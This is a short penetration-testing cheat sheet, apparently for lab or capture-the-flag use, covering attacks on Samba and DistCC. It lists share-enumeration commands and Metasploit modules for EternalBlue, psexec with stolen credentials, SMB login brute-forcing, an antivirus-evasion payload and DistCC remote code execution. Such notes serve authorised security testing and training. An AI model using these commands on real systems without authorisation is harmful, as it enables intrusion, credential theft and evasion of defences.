Table of Contents

• Samba
  • Enumeration
    • Smbclient
    • Crackmapexec
    • Psexec_command or Usermap_script Msf
  • Foothold
    • MS_17_010
    • Psexec.py
    • Psexec Msf
    • Smb_login Msf
• DistCC
  • Foothold
    • CVE-2004-2687

Samba

Enumeration

Smbclient

List all shares

smbclient -L \\\\<URL>\\

Crackmapexec

List all shares

crackmapexec smb <ip> -u <username> -p <password> --shares

Psexec_command or Usermap_script Msf

Execute smb command

auxiliary/admin/smb/psexec_command

set COMMAND [command you want to run at the command line]

# or

use exploit/multi/samba/usermap_script

Foothold

MS_17_010

Eternal Blue exploitation

use ms17_010

Psexec.py

Use admin password to gain writable share to ADMIN$, upload payload and execute

psexec.py <username>@<host>

Psexec Msf

Got user credential

exploit/windows/smb/psexec

# Optional
set EXE::Custom/root/veil-output/compiled/updater12.exe (veil AV evade payload)

Smb_login Msf

Brute force login credential

auxiliary/scanner/smb/smb_login

DistCC

Foothold

CVE-2004-2687

Remote Code Execution

use exploit/unix/misc/distcc_exec